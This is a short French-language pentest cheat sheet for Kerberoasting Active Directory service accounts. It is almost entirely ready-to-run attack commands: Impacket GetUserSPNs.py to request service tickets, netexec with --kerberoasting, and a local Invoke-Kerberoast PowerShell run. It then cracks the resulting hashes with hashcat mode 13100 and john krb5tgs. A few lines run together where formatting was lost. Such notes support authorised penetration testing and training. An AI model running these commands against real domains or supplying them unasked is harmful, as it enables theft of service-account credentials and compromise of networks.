Kerberoast
À distance
GetUserSPNs.py -request -dc-ip <dc ip> <domain>/<user> -save -outputfile kerberoast.txt Tip
Si l’erreur suivante apparait [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), c’est que la cible et l’attaquant ne partage pas le même temps. Il est donc nécessaire de les synchroniser à l’aide de ntpdate <dc ip>.
Une fois les jetons kerberoastable récupérés, il est possible d’utiliser netexec afin de récupérer les hashes des jetons récupérés.
nxc ldap <dc_ip> -u '<user>' -p '<password>' --kerberoasting kerberoastable.txtIl est ensuite possible de cracker les hashes avec john ou hashcat:
hashcat -m 13100 kerberoast.txt $wordlistjohn --format=krb5tgs --wordlist=$wordlist kerberoast.txtEn local
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast
john --format=krb5tgs /tmp/tocrack